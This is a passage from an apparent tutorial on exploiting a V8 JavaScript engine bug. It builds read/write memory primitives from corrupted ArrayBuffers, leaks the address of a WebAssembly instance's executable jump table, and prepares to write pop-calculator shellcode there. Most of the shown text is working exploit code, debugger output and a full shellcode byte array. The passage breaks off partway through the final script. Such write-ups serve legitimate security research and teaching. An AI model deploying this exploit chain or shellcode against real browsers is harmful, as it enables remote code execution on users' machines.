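console.log(load64(0x300n).toString(16));           // 41414141
```

After the one-time corruption in step 1, no further use of the bug is needed, which is exactly what the two array buffer approach is meant to buy us.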

To test if this works, let’s try using the write64 memory primitive to write the value 0x41414141n to the second array buffer’s backing store. The code for that would look like this:

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct our Memory Read and Write Primitive
let memory = {
	read64(addr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		return view2[0];
	},
	write64(addr, ptr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		view2[0] = ptr;
	}
};
print("[+] Constructed Memory Read and Write Primitive!");

// Write Data to Second Array Buffer
memory.write64(originalArrBuf2BackingStore, 0x41414141n);
%DebugPrint(arrBuf2);

Next, we can use WinDbg again to debug this by setting a breakpoint on RUNTIME_FUNCTION(Runtime_DebugPrint) and then executing the script. Once we hit the breakpoint, type g or press Go, and then press Shift + F11 or “Step Out” to see the debug output in the console.

[+] Finding Overlapping Properties...
[+] Properties p15 and p22 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x39532f0db50
[+] Corrupting ArrayBuffer Backing Store Address...
[+] Constructed Memory Read and Write Primitive!
DebugPrint: 0000039532F0DB51: [JSArrayBuffer] in OldSpace
 - map: 0x03a3a6384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x02ac8fd10b21 <Object map = 000003A3A63843C1>
 - elements: 0x009c20b82cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 000002791B474430
 - byte_length: 1024
 - neuterable
 - properties: 0x009c20b82cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, the backing store pointer is at the address 0x000002791B474430. Using WinDbg, let’s view that address and confirm that we did in fact write to that buffer.

0:000> dq 000002791B474430 L6
00000279`1b474430  00000000`41414141 00000000`00000000
00000279`1b474440  00000000`00000000 00000000`00000000
00000279`1b474450  00000000`00000000 00000000`00000000

And there we have it! We have successfully built a memory read/write primitive and can now write data to any location in the V8 heap. With this in place, we can move on to the next step of the exploit, which is gaining remote code execution!

Gaining Code Execution

With our memory primitives in place, we need to find a way to have V8 execute our code. Unfortunately, we cannot simply write or inject shellcode into random V8 heap regions or into our array buffer because NX is enabled.

This can be verified by using the !vprot WinDbg extension command on the array buffer’s backing store pointer.

0:000> !vprot 000002791B474430
BaseAddress:       000002791b474000
AllocationBase:    000002791b390000
AllocationProtect: 00000004  PAGE_READWRITE
RegionSize:        000000000001b000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

As you can see, we only have read and write access to these memory pages, but no execution permissions.

Since we cannot execute our code in these memory pages, we need to find a different solution.

One potential solution is to target JIT memory pages. JIT compilation of JavaScript code requires the compiler to write instructions into a memory page that can later be executed. Since this happens in line with code execution, these pages typically have RWX permissions. This would be a good target for our memory read/write primitives, where we can attempt to leak a pointer from a JIT compiled JavaScript function, write our shellcode to that address, and then call the function to execute our own code.

However, in early 2018 the V8 team introduced a protection called write_protect_code_memory, which flips the permissions of JIT memory pages between read/execute and read/write. As a result, these pages are marked as read/execute during JavaScript execution, preventing us from writing malicious code into them.

One way to bypass this protection is to use Return Oriented Programming (ROP). With ROP, we can exploit vtables (which store the addresses of virtual functions), hijack JIT function pointers, or even corrupt the stack.

Examples of how ROP gadgets can be used to exploit vtables can be found in the blog post “One Day Short of a Full Chain: Part 3 - Chrome Renderer RCE” and in Connor McGarr’s “Browser Exploitation on Windows” post.

While ROP is an effective technique for exploit development, I like to live by the “Work Smart Not Hard” motto and avoid doing more work than necessary. Fortunately for us, JavaScript isn’t the only language in V8 that gets compiled. There’s WebAssembly too!

Basic WebAssembly Internals

WebAssembly (also known as wasm) is a low-level programming language that is designed for in-browser client-side execution, and it is often used to support C/C++ and similar languages.

One of the benefits of WebAssembly is that it allows for communication between WebAssembly modules and the JavaScript context. This enables WebAssembly modules to access browser functionality through the same Web APIs that are available to JavaScript.

Initially, the V8 engine does not run WebAssembly through an optimizing compiler. Instead, wasm functions are first compiled by the baseline compiler known as Liftoff. Liftoff iterates over the WebAssembly code once and immediately emits machine code for each WebAssembly instruction, similar to how Sparkplug translates Ignition’s bytecode into machine code.

Since wasm is also JIT compiled, its memory pages are marked with Read-Write-Execute permissions. There is an associated write-protect-flag for wasm, but it is disabled by default because of the asm.js file as explained by Johnathan Norman. This makes wasm a valuable tool for our exploit development efforts.

Before we can use WebAssembly in our exploitation efforts, we first need to understand a little bit about its structure and how it works. Unfortunately, I won’t be covering everything about WebAssembly because that in and of itself could be a separate blog post. As such, I will only cover the important parts we need to know.

In WebAssembly, a compiled piece of code is known as a “module”. These modules are then instantiated to produce an executable object called an “instance”. An instance is an object that contains all of the exported WebAssembly functions, which allow calling into WebAssembly code from JavaScript.

In the V8 engine, these objects are known as the WasmModuleObject and WasmInstanceObject respectively and can be found within the v8/src/wasm/wasm-objects.h source file.

WebAssembly is a binary instruction format, and its module is similar to a Portable Executable (PE) file. Like a PE file, a WebAssembly module also contains sections. There are about 11 standard sections in a WebAssembly module:

  1. Type
  2. Import
  3. Function
  4. Table
  5. Memory
  6. Global
  7. Export
  8. Start
  9. Element
  10. Code
  11. Data

For a more detailed explanation of each section, I suggest reading the “Introduction to WebAssembly” article.
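To make the section list a bit more concrete, here is a rough sketch of a section walker. It assumes the standard binary layout (an 8 byte header, followed by sections that each start with a one byte ID and a LEB128 encoded size), and it includes ID 0 for custom sections, which is not part of the list above. The bytes are the small WasmFiddle module used later in this post, and the helper names readLeb128 and listSections are my own.

```javascript
// Section names indexed by section ID (ID 0 is the custom section).
const SECTION_NAMES = ["Custom", "Type", "Import", "Function", "Table", "Memory",
                       "Global", "Export", "Start", "Element", "Code", "Data"];

// The WasmFiddle "return 42" module that appears later in this post.
const moduleBytes = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

// Decode an unsigned LEB128 integer starting at pos; returns [value, nextPos].
function readLeb128(bytes, pos) {
  let result = 0;
  let shift = 0;
  let byte;
  do {
    byte = bytes[pos++];
    result |= (byte & 0x7f) << shift;
    shift += 7;
  } while (byte & 0x80);
  return [result >>> 0, pos];
}

// Walk the module and collect the ID, name and size of each section.
function listSections(bytes) {
  const sections = [];
  let pos = 8; // skip the "\0asm" magic and the 4 byte version
  while (pos < bytes.length) {
    const id = bytes[pos++];
    let size;
    [size, pos] = readLeb128(bytes, pos);
    sections.push({ id, name: SECTION_NAMES[id] ?? "Unknown", size });
    pos += size; // skip over the section contents
  }
  return sections;
}

for (const { id, name, size } of listSections(moduleBytes)) {
  console.log(String(id).padStart(2), name.padEnd(9), `${size} bytes`);
}
```

For this module the walker reports the Type, Function, Table, Memory, Global, Export and Code sections, so even a function that just returns 42 ships with a table section.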

What I want to focus on is the table section. In WebAssembly, tables are a mechanism for mapping values that can’t be represented or directly accessed by WebAssembly, such as GC references, raw OS handles, or native pointers. Additionally, each table has an element type that specifies the kind of data it holds.

In WebAssembly, each instance has one designated “default” table that is indexed by the call_indirect operation. This operation is an instruction that performs a call to a function within the default table.

In 2018, the V8 development team updated WebAssembly to use jump tables for all calls, in order to implement lazy compilation and more efficient tier-ups. As a result, all WebAssembly function calls within V8 call to a slot in that jump table, which then jumps to the actual compiled code (or the WasmCompileLazy stub).

Within V8, the jump table (also known as the code table) serves as the central dispatch point for all (direct and indirect) invocations in WebAssembly. The jump table holds one slot per function in a module, with each slot containing a dispatch to the currently published WasmCode corresponding to the associated function. More information on the jump table implementation can be found in the /src/wasm/jump-table-assembler.h source file.

When WebAssembly code is generated, the compiler makes it available to the system by entering it into the code table and patching the jump table for a particular instance. It then returns a raw pointer to the WasmCode object. Because this code is JIT compiled, the pointer points to a section of memory with RWX permissions. Every time the corresponding function to the WasmCode is called, V8 jumps to that address and executes the compiled code.

This RWX memory section pointed to by the jump table is what we want to target with our memory read/write primitives to achieve remote code execution!

Abusing WebAssembly Memory

Now that we have a better understanding of WebAssembly and know that we need to target the jump table pointer for remote code execution, let’s write some wasm code and explore how it looks in memory so we can better understand how to use it for our exploit.

One easy way to write wasm code is to use WasmFiddle, which will allow us to write C code and get the outputs of the code buffer and JavaScript code needed to run it. Using the default code to return 42, we get the following JavaScript code.

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;
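As a quick sanity check, the same bytes can be validated and the export called from any JavaScript engine with WebAssembly support, not just d8. The sketch below uses different variable names (bytes, instance) so it doesn’t clash with the snippet above.

```javascript
// Same module bytes as above.
const bytes = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

// Check that the bytes form a well-formed module before compiling it.
console.log(WebAssembly.validate(bytes)); // true

// Compile and instantiate synchronously (fine for a module this small).
const instance = new WebAssembly.Instance(new WebAssembly.Module(bytes));

// The module exports its linear memory and the main function.
console.log(Object.keys(instance.exports));

// Calling the export runs the compiled machine code.
console.log(instance.exports.main()); // 42

// The exported memory starts out as a single 64 KiB page.
console.log(instance.exports.memory.buffer.byteLength); // 65536
```

Calling main() is the step that matters for us later on, since it is what transfers execution into the compiled wasm code.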

After executing this code in d8, we can use %DebugPrint against our wasmInstance variable, which will be the executable module object that houses our function exports. As you can see, in the last line of the wasm code we are setting the func variable to target the main export of that wasm instance, which will point to our executable wasmCode.

Doing so, we get the following output.

d8> %DebugPrint(wasmInstance)
DebugPrint: 0000032B465226A9: [WasmInstanceObject] in OldSpace
 - map: 0x02d1cc30ae51 <Map(HOLEY_ELEMENTS)>
 - module_object: 0x0135bd78e159 <Module map = 000002D1CC30A8B1>
 - exports_object: 0x0135bd78e341 <Object map = 000002D1CC30C3E1>
 - native_context: 0x032b465039f9 <NativeContext[248]>
 - memory_object: 0x032b465227a9 <Memory map = 000002D1CC30B851>
 - imported_function_instances: 0x00bca7c82cf1 <FixedArray[0]>
 - imported_function_callables: 0x00bca7c82cf1 <FixedArray[0]>
 - managed_native_allocations: 0x0135bd78e2d1 <Foreign>
 - memory_start: 00000273516A0000
 - memory_size: 65536
 - memory_mask: ffff
 - imported_function_targets: 00000272D08C73D0
 - globals_start: 0000000000000000
 - imported_mutable_globals: 00000272D08C7410
 - indirect_function_table_size: 0
 - indirect_function_table_sig_ids: 0000000000000000
 - indirect_function_table_targets: 0000000000000000
...

After analyzing the output, we can see that there is no reference to a code or jump table. However, if we look into V8’s code for WasmInstanceObject, we will see that there is an accessor to a jump_table_start entry for our function. This entry should point to an RWX memory region where the machine code is stored.

In V8, there is an offset to this jump_table_start entry, but it changes regularly between versions of V8. Therefore, we need to manually locate where this address is stored within the WasmInstanceObject.

To assist us in finding where this address is stored within the WasmInstanceObject, we can use the !address command within WinDbg to display information about the memory used by the d8 process. Since we know that the jump_table_start address has RWX permissions, we can filter the address output by the PAGE_EXECUTE_READWRITE protection constant to look for any newly created RWX memory regions.

Doing so results in the following output.

0:004> !address -f:PAGE_EXECUTE_READWRITE

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
      55`6c400000       55`6c410000        0`00010000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             <unknown>  [I....lU...A....D]

In this case it seems that the address 0x556C400000 is the RWX memory region that our jump table entry points to. Let’s validate that our WasmInstanceObject does in fact store this pointer by examining the memory contents at the wasmInstance object address within WinDbg.

0:004> dq 0000032B465226A9-1 L22
0000032b`465226a8  000002d1`cc30ae51 000000bc`a7c82cf1
0000032b`465226b8  000000bc`a7c82cf1 00000135`bd78e159
0000032b`465226c8  00000135`bd78e341 0000032b`465039f9
0000032b`465226d8  0000032b`465227a9 000000bc`a7c825a1
0000032b`465226e8  000000bc`a7c825a1 000000bc`a7c825a1
0000032b`465226f8  000000bc`a7c825a1 000000bc`a7c82cf1
0000032b`46522708  000000bc`a7c82cf1 000000bc`a7c825a1
0000032b`46522718  00000135`bd78e2d1 000000bc`a7c825a1
0000032b`46522728  000000bc`a7c825a1 000000bc`a7c822a1
0000032b`46522738  00000097`8399dba1 00000273`516a0000
0000032b`46522748  00000000`00010000 00000000`0000ffff
0000032b`46522758  00000272`d08d45f8 00000272`d08dc6c8
0000032b`46522768  00000272`d08dc6b8 00000272`d08c73d0
0000032b`46522778  00000000`00000000 00000272`d08c7410
0000032b`46522788  00000000`00000000 00000000`00000000
0000032b`46522798  00000055`6c400000 000000bc`00000000
0000032b`465227a8  000002d1`cc30b851 000000bc`a7c82cf1

After analyzing the output, we can see that our jump table entry pointer to the RWX memory page is indeed stored within our wasmInstance object at the address of 0x32b46522798!

From here, we can do some simple hexadecimal math to find the offset to the RWX page from the base address of the WasmInstanceObject minus 1 (due to pointer tagging).

0x798 - (0x6A9 - 0x1) = 0xF0 (240)

With this, we know that the offset of the jump table is 240 bytes, or 0xF0, away from the base address of the instance object.
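Since this offset moves between V8 versions, it can help to recompute it from the debugger output rather than by hand. The sketch below is only an illustration: offsetInDump and untag are hypothetical helper names, and dumpExcerpt contains just the first line and the matching line of the dq output shown earlier.

```javascript
// Clear the low tag bit of a V8 heap pointer.
const untag = (ptr) => ptr & ~1n;

// Return the byte offset of `target` relative to `base` in WinDbg `dq` output, or -1n.
function offsetInDump(lines, base, target) {
  for (const line of lines) {
    // First column is the line address, the rest are the quadwords on that line.
    const [addr, ...values] = line.trim().split(/\s+/)
      .map((col) => BigInt("0x" + col.replace("`", "")));
    const col = values.indexOf(target);
    if (col !== -1) return addr + 8n * BigInt(col) - base;
  }
  return -1n;
}

// Excerpt of the dump: the first line and the line holding the RWX pointer.
const dumpExcerpt = [
  "0000032b`465226a8  000002d1`cc30ae51 000000bc`a7c82cf1",
  "0000032b`46522798  00000055`6c400000 000000bc`00000000",
];
const instance = 0x0000032B465226A9n; // tagged address printed by %DebugPrint
const rwxPage = 0x556c400000n;        // base address reported by !address

const offset = offsetInDump(dumpExcerpt, untag(instance), rwxPage);
console.log("0x" + offset.toString(16)); // 0xf0
```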

With this, we can now update our exploit script by adding the WebAssembly sample code from above and then attempt to leak the RWX address of the jump table entry!

However, we have a slight problem. Unfortunately, we can’t use our addrOf primitive to leak the object address anymore. The reason for this is that the addrOf primitive abuses our bug by overwriting the overlapping properties. This essentially would destroy our memory read/write primitive that we set up via our array buffers, resulting in writing to wrong memory regions and potentially causing a crash.

In this case, we need to utilize our memory read/write primitive via our array buffers to leak an object address. Using what we already have, we can build another addrOf primitive via our array buffers by doing the following:

  1. Add an out-of-line property to the second array buffer.
  2. Leak the address of the second array buffer’s property store.
  3. Use the read64 memory primitive to read the address of our object at offset 16 in the property store.

Before we implement this, let’s see what this looks like in memory to confirm that it will work. Let’s start by creating a new array buffer called arrBuf1 and then create a random object, like so.

d8> let arrBuf1 = new ArrayBuffer(1024);
d8> let obj = {x:1}

Next, let’s set a new out-of-line property for arrBuf1 called leakme and set our object as its value.

d8> arrBuf1.leakme = obj;

If we run the %DebugPrint command against arrBuf1 we will see that we now have a new out-of-line property stored within the properties data store.

d8> %DebugPrint(arrBuf1)
DebugPrint: 000003B88950D8B9: [JSArrayBuffer]
 - map: 0x02fd7d78c251 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x01d6b8c90b21 <Object map = 000002FD7D7843C1>
 - elements: 0x03bfa9d82cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 00000181293E0780
 - byte_length: 1024
 - neuterable
 - properties: 0x03b88950fe29 <PropertyArray[3]> {
    #leakme: 0x03b88950f951 <Object map = 000002FD7D78C201> (data field 0) properties[0]
 }
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As we can see, the address for obj is 0x03b88950f951 as per the property store. If we were to look into our property store for arrBuf1 with WinDbg we can see that at offset 16 in the property store, we have the address of our object!

0:005> dq 0x03b88950fe29-1 L6
000003b8`8950fe28  000003bf`a9d83899 00000003`00000000
000003b8`8950fe38  000003b8`8950f951 000003bf`a9d825a1
000003b8`8950fe48  000003bf`a9d825a1 000002fd`7d784fa1

Alright, we confirmed that this works. In that case let’s go ahead and implement a new addrOf function for our memory read/write primitive as follows:

let memory = {
  addrOf(obj) {
    // Store the object in a new out-of-line property called leakMe
    arrBuf2.leakMe = obj;
    // Use the read64 primitive to read the tagged property store pointer at offset 8 of arrBuf2, then untag it
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    // Read offset 16 of the property store and return the untagged address of our object
    return this.read64(props + 16n) - 1n;
  }
};
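The pointer chase inside addrOf can also be tried out without a vulnerable build by modelling memory as a plain buffer. The following is a simulation only: heap, ARRBUF2, PROPS and OBJ are made-up names and addresses, and the field offsets (8 for the property store pointer, 16 for the first property) are the ones observed in the dumps above.

```javascript
// Simulated little-endian memory; "addresses" are byte offsets into this buffer.
const heap = new DataView(new ArrayBuffer(0x400));
const read64 = (addr) => heap.getBigUint64(Number(addr), true);
const write64 = (addr, value) => heap.setBigUint64(Number(addr), value, true);

// Hypothetical addresses for the simulation.
const ARRBUF2 = 0x100n; // fake JSArrayBuffer
const PROPS = 0x200n;   // fake PropertyArray
const OBJ = 0x300n;     // fake target object

// Lay out the fake objects with tagged pointers (+1), as V8 would store them.
write64(ARRBUF2 + 8n, PROPS + 1n); // property store pointer of the array buffer
write64(PROPS + 8n, 3n << 32n);    // PropertyArray length as a Smi
write64(PROPS + 16n, OBJ + 1n);    // properties[0] holds the object

// Same two reads as memory.addrOf, applied to the simulated heap.
function simulatedAddrOf(arrBufAddr) {
  const props = read64(arrBufAddr + 8n) - 1n;
  return read64(props + 16n) - 1n;
}

const leaked = simulatedAddrOf(ARRBUF2);
console.log("0x" + leaked.toString(16)); // 0x300
```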

With that implemented, we can finally update our exploit script to include the new addrOf primitive and our WebAssembly code. Afterwards, we can attempt to leak the address of our wasmInstance and the instance’s RWX jump table page.

The updated script will look like so:

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct our Memory Read and Write Primitive
let memory = {
  read64(addr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    return view2[0];
  },
  write64(addr, ptr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    view2[0] = ptr;
  },
  addrOf(obj) {
    arrBuf2.leakMe = obj;
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    return this.read64(props + 16n) - 1n;
  }
};
print("[+] Constructed Memory Read and Write Primitive!");

// Generate RWX region via WASM
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

// Leak WasmInstance Address
let wasmInstanceAddr = memory.addrOf(wasmInstance);
print(`[+] WASM Instance Address: 0x${wasmInstanceAddr.toString(16)}`);
// Leak Jump Table Start Pointer (RWX Page)
let wasmRWXAddr = memory.read64(wasmInstanceAddr + 0xF0n);
print(`[+] WASM RWX Page Address: 0x${wasmRWXAddr.toString(16)}`);

Upon executing the updated script in d8, we will notice the following output.

[+] Finding Overlapping Properties...
[+] Properties p6 and p18 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x37779c8db50
[+] Corrupting ArrayBuffer Backing Store Address...
[+] Constructed Memory Read and Write Primitive!
[+] WASM Instance Address: 0x2998447e580
[+] WASM RWX Page Address: 0x47f9400000

It appears that we were able to successfully leak the address of our wasmInstance as well as our jump_table_start pointer.

To confirm that the leaked addresses are valid, we can use WinDbg to inspect the wasmInstance address to validate the object structure and check if at offset 240 we have our jump table address.

0:000> dq 0x2998447e580 L22
00000299`8447e580  000002da`4608ae51 0000005a`4e802cf1
00000299`8447e590  0000005a`4e802cf1 00000191`5d8d03d1
00000299`8447e5a0  00000191`5d8d05b9 000000ea`a9d839f9
00000299`8447e5b0  00000299`8447e681 0000005a`4e8025a1
00000299`8447e5c0  0000005a`4e8025a1 0000005a`4e8025a1
00000299`8447e5d0  0000005a`4e8025a1 0000005a`4e802cf1
00000299`8447e5e0  0000005a`4e802cf1 0000005a`4e8025a1
00000299`8447e5f0  00000191`5d8d0549 0000005a`4e8025a1
00000299`8447e600  0000005a`4e8025a1 0000005a`4e8022a1
00000299`8447e610  0000009a`1229dba1 000001fd`60c00000
00000299`8447e620  00000000`00010000 00000000`0000ffff
00000299`8447e630  000001fc`dff063c8 000001fc`dff0e498
00000299`8447e640  000001fc`dff0e488 000001fc`e0a00b50
00000299`8447e650  00000000`00000000 000001fc`e0a02720
00000299`8447e660  00000000`00000000 00000000`00000000
00000299`8447e670  00000047`f9400000 0000005a`00000000
00000299`8447e680  000002da`4608b851 0000005a`4e802cf1

Upon inspection of the memory, we can confirm that we are leaking valid addresses, as 0x000002998447e670 contains the pointer to our jump table start entry!
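Because the 0xF0 offset is specific to this V8 build, a cheap sanity check on the leaked value can catch a wrong offset before anything is written to it. The sketch below is an addition and not part of the original exploit: looksLikePageBase is a hypothetical helper, and the 4 KiB page size is an assumption about the target system.

```javascript
// Assumption: 4 KiB pages, so a freshly mapped region starts on a 0x1000 boundary.
const PAGE_SIZE = 0x1000n;

// A plausible RWX region base is non-zero and page-aligned.
function looksLikePageBase(addr) {
  return addr !== 0n && addr % PAGE_SIZE === 0n;
}

console.log(looksLikePageBase(0x47f9400000n));  // true: the leaked jump table page
console.log(looksLikePageBase(0x2998447e580n)); // false: the wasmInstance object itself
```

A check like this only rules out obviously wrong values; it does not prove that the page is actually executable.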

Alright, we’re nearing the final stretch! Now that we have a valid jump table address that points to a RWX memory page, all we have to do is write our shellcode to that memory region, and then trigger our WebAssembly function to execute the code!

For this blog post, I will be using a Null-Free WinExec PopCalc shellcode that will simply execute the calculator app upon successful execution. Of course, it’s up to the reader to implement whatever shellcode they want for their own script!

Since our original WebAssembly code is using a Uint8Array, we’ll have to make sure that we wrap our shellcode in the same typed array representation. An example of what our pop calc shellcode will look like in our script can be seen below.

// Prepare Calc Shellcode
let shellcode = new Uint8Array([0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6]);

After preparing our shellcode, we now need to add a new memory write primitive via our array buffers, since our current write64 function only writes data using the BigUint64Array representation.

For this write primitive, we can reuse the code for write64, but with two minor changes. First of all, we need to make view2 a Uint8Array instead of a BigUint64Array. Second of all, to write our full shellcode via our view, we will call the set function. This allows us to store multiple values in the array buffer instead of just using an index as before.

The new write memory primitive will look like so:

let memory = {
  write(addr, bytes) {
    view1[4] = addr;
    let view2 = new Uint8Array(arrBuf2);
    view2.set(bytes);
  }
};
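To see what set does in isolation, here is a small sketch on an ordinary, uncorrupted ArrayBuffer. The names target, view and payload are illustrative, and the payload is placeholder data rather than shellcode.

```javascript
// Stand-in for arrBuf2: a view over it can never be longer than the buffer itself.
const target = new ArrayBuffer(16);
const view = new Uint8Array(target);

// Placeholder bytes, not real shellcode.
const payload = new Uint8Array([0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xaa]);

// set() copies every element of `payload` into the view, starting at index 0.
view.set(payload);

// Reading the first 8 bytes back as one little-endian quadword shows how the
// same data would have had to be packed for write64.
const firstQword = new DataView(target).getBigUint64(0, true);
console.log("0x" + firstQword.toString(16)); // 0x8877665544332211

// A payload larger than the view is rejected with a RangeError, not truncated.
let tooLarge = false;
try {
  view.set(new Uint8Array(17));
} catch (e) {
  tooLarge = e instanceof RangeError;
}
console.log(tooLarge); // true
```

Assuming the view length still follows the array buffer’s original byte length of 1024 after the backing store pointer is replaced, the shellcode has to fit within 1024 bytes, which the calc payload above comfortably does.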

With that completed, all that’s left to do is to update the exploit script to include the new write primitive, add our shellcode, write it to the leaked jump table address, and finally call our WebAssembly function to execute our shellcode!

The final updated exploit script will look like so.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address @ 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct Memory Primitives via Array Buffers
let memory = {
  write(addr, bytes) {
    view1[4] = addr;
    let view2 = new Uint8Array(arrBuf2);
    view2.set(bytes);
  },
  read64(addr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    return view2[0];
  },
  write64(addr, ptr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    view2[0] = ptr;
  },
  addrOf(obj) {
    arrBuf2.leakMe = obj;
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    return this.read64(props + 16n) - 1n;
  }
};

print("[+] Constructed Memory Read and Write Primitive!");

print("[+] Generating a WebAssembly Instance...");

// Generate RWX region for Shellcode via WASM
